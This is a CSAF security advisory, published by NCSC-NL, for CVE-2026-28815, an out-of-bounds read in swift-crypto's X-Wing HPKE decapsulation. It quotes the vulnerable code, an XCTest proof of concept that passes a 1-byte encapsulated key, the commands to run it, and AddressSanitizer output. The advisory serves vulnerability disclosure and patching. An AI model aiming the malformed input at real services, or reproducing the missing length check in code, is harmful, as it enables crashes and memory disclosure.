{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-28815", "tracking": { "current_release_date": "2026-04-03T15:44:44.494659Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-28815", "initial_release_date": "2026-04-03T02:38:40.835672Z", "revision_history": [ { "date": "2026-04-03T02:38:40.835672Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| Products created (1).| References created (1)." }, { "date": "2026-04-03T02:38:49.864757Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-04-03T03:25:06.459361Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (1)." }, { "date": "2026-04-03T04:39:43.781943Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-04-03T07:35:14.255752Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-04-03T14:26:45.497454Z", "number": "6", "summary": "CVSS created.| CWES updated (1)." }, { "date": "2026-04-03T14:26:48.276426Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-04-03T14:39:43.264107Z", "number": "8", "summary": "CVSS created.| CWES updated (1).| Unknown change." }, { "date": "2026-04-03T14:39:55.106101Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-04-03T15:40:25.766667Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-04-03T15:40:37.520678Z", "number": "11", "summary": "NCSC Score updated." } ], "status": "interim", "version": "11" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/4.0.0|<4.3.1", "product": { "name": "vers:unknown/4.0.0|<4.3.1", "product_id": "CSAFPID-5986531" } } ], "category": "product_name", "name": "macOS" } ], "category": "vendor", "name": "Apple" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-28815", "cwe": { "id": "CWE-787", "name": "Out-of-bounds Write" }, "notes": [ { "category": "description", "text": "A remote attacker can supply a short X-Wing HPKE encapsulated key and trigger an out-of-bounds read in the C decapsulation path, potentially causing a crash or memory disclosure depending on runtime protections. This issue is fixed in swift-crypto version 4.3.1.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28815.json" }, { "category": "description", "text": "A remote attacker can supply a short X-Wing HPKE encapsulated key and trigger an out-of-bounds read in the C decapsulation path, potentially causing a crash or memory disclosure depending on runtime protections. This issue is fixed in swift-crypto version 4.3.1.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28815" }, { "category": "description", "text": "### Summary\n\nThe X-Wing decapsulation path accepts attacker-controlled encapsulated ciphertext bytes without enforcing the required fixed ciphertext length. The decapsulation call is forwarded into a C API, which expects a compile-time fixed-size ciphertext buffer of 1120 bytes. This creates an FFI memory-safety boundary issue when a shorter `Data` value is passed in, because the C code may read beyond the Swift buffer.\n\nThe issue is reachable through initialization of an `HPKE.Recipient`, which decapsulates the provided `encapsulatedKey` during construction. A malformed `encapsulatedKey` can therefore trigger undefined behavior instead of a safe length-validation error.\n\n### Details\n\nThe `decapsulate` function of `OpenSSLXWingPrivateKeyImpl` does not perform a length check before passing the `encapsulated` data to the C API.\n\n```swift\nfunc decapsulate(_ encapsulated: Data) throws -> SymmetricKey {\n try SymmetricKey(unsafeUninitializedCapacity: Int(XWING_SHARED_SECRET_BYTES)) { sharedSecretBytes, count in\n try encapsulated.withUnsafeBytes { encapsulatedSecretBytes in\n let rc = CCryptoBoringSSL_XWING_decap(\n sharedSecretBytes.baseAddress,\n encapsulatedSecretBytes.baseAddress,\n &self.privateKey\n )\n guard rc == 1 else {\n throw CryptoKitError.internalBoringSSLError()\n }\n count = Int(XWING_SHARED_SECRET_BYTES)\n }\n }\n}\n```\n\nThe C API does not have a runtime length parameter and instead expects a fixed-size buffer of 1120 bytes.\n\n```c\n#define XWING_CIPHERTEXT_BYTES 1120\n\nOPENSSL_EXPORT int XWING_decap(\n uint8_t out_shared_secret[XWING_SHARED_SECRET_BYTES],\n const uint8_t ciphertext[XWING_CIPHERTEXT_BYTES],\n const struct XWING_private_key *private_key);\n```\n\nSince `decapsulate` accepts arguments of any length, an attacker controlled input can trigger an out-of-bounds read. The vulnerable code path can be reached through by initializing a `HPKE.Recipient`. This creates a new `HPKE.Context`, which decapsulates the attacker-controlled `enc` argument:\n\n```swift\ninit(recipientRoleWithCiphersuite ciphersuite: Ciphersuite, mode: Mode, enc: Data, psk: SymmetricKey?, pskID: Data?, skR: PrivateKey, info: Data, pkS: PrivateKey.PublicKey?) throws {\n let sharedSecret = try skR.decapsulate(enc)\n self.encapsulated = enc\n self.keySchedule = try KeySchedule(mode: mode, sharedSecret: sharedSecret, info: info, psk: psk, pskID: pskID, ciphersuite: ciphersuite)\n}\n```\n\n### PoC\n\nThis PoC constructs an `HPKE.Recipient` using the X-Wing ciphersuite and deliberately passes a 1-byte `encapsulatedKey` instead of the required 1120 bytes. In a normal run, the malformed input is accepted and it reaches the vulnerable decapsulation path, i.e., no size rejection occurs. In an AddressSanitizer run, the same PoC produces a `dynamic-stack-buffer-overflow` read, confirming memory-unsafe behavior.\n\n```swift\n//===----------------------------------------------------------------------===//\n//\n// PoC for X-Wing malformed ciphertext-length decapsulation:\n// X-Wing decapsulation accepts malformed ciphertext length and forwards it to C.\n//\n// This test is intentionally unsafe and is expected to crash (or trip ASan)\n// on vulnerable builds when run.\n//\n//===----------------------------------------------------------------------===//\n\n#if canImport(FoundationEssentials)\nimport FoundationEssentials\n#else\nimport Foundation\n#endif\nimport XCTest\n\n#if CRYPTO_IN_SWIFTPM && !CRYPTO_IN_SWIFTPM_FORCE_BUILD_API\n// Skip tests that require @testable imports of CryptoKit.\n#else\n#if !CRYPTO_IN_SWIFTPM_FORCE_BUILD_API\n@testable import CryptoKit\n#else\n@testable import Crypto\n#endif\n\nfinal class XWingMalformedEncapsulationPoCTests: XCTestCase {\n func testShortEncapsulatedKeyHPKERecipientInit() throws {\n if #available(iOS 19.0, macOS 16.0, watchOS 12.0, tvOS 19.0, macCatalyst 19.0, *) {\n let ciphersuite = HPKE.Ciphersuite.XWingMLKEM768X25519_SHA256_AES_GCM_256\n let skR = try XWingMLKEM768X25519.PrivateKey.generate()\n let malformedEncapsulatedKey = Data([0x00]) // should be 1120 bytes\n\n // Vulnerable path: HPKE.Recipient -> skR.decapsulate(enc) -> XWING_decap(...)\n _ = try HPKE.Recipient(\n privateKey: skR,\n ciphersuite: ciphersuite,\n info: Data(),\n encapsulatedKey: malformedEncapsulatedKey\n )\n\n XCTFail(\"Unexpectedly returned from malformed decapsulation path\")\n }\n }\n}\n\n#endif // CRYPTO_IN_SWIFTPM\n```\n\n#### Steps\n\n1. Add the PoC XCTest above to the test suite.\n2. Run the PoC normally to verify that malformed input is not rejected by length:\n ```bash\n swift test --filter XWingMalformedEncapsulationPoCTests/testShortEncapsulatedKeyHPKERecipientInit\n ```\n3. Run the same PoC with AddressSanitizer enabled to detect out-of-bounds memory access:\n ```bash\n swift test --sanitize=address --filter XWingMalformedEncapsulationPoCTests/testShortEncapsulatedKeyHPKERecipientInit\n ```\n\n#### Results\n\n##### Normal run\n\nThe PoC test reaches the `XCTFail` path. `HPKE.Recipient(...)` accepted a `1`-byte X-Wing encapsulated key instead of rejecting it for incorrect length.\n\n```text\nTest Case 'XWingMalformedEncapsulationPoCTests.testShortEncapsulatedKeyHPKERecipientInit' started\n... failed - Unexpectedly returned from malformed decapsulation path\n```\n\n##### AddressSanitizer run\n\nThe sanitizer run aborts with a read overflow while executing the same PoC path. This confirms the memory-safety violation. The malformed ciphertext reaches memory-unsafe behavior in the decapsulation chain.\n\n```text\nERROR: AddressSanitizer: dynamic-stack-buffer-overflow\nREAD of size 1\n...\nSUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow\n==...==ABORTING\n```\n\n### Impact\n\nA remote attacker can supply a short X-Wing HPKE encapsulated key and trigger an out-of-bounds read in the C decapsulation path, potentially causing a crash or memory disclosure depending on runtime protections.\n\nReported by Cantina.", "title": "github - https://api.github.com/advisories/GHSA-9m44-rr2w-ppp7" }, { "category": "other", "text": "0.00017", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "8.8", "title": "CVSSV4 base score" }, { "category": "other", "text": "4.0", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) product Macos, Is related to a product by vendor Apple", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "The value of the most recent EPSS score, There is cwe data available from source Nvd, The CVSS vector string contains C:H (Confidentiality Impact: High)", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5986531" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28815.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28815" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-9m44-rr2w-ppp7" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/apple/swift-crypto/security/advisories/GHSA-9m44-rr2w-ppp7" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28815" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-9m44-rr2w-ppp7" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5986531" ] } ], "title": "CVE-2026-28815" } ] }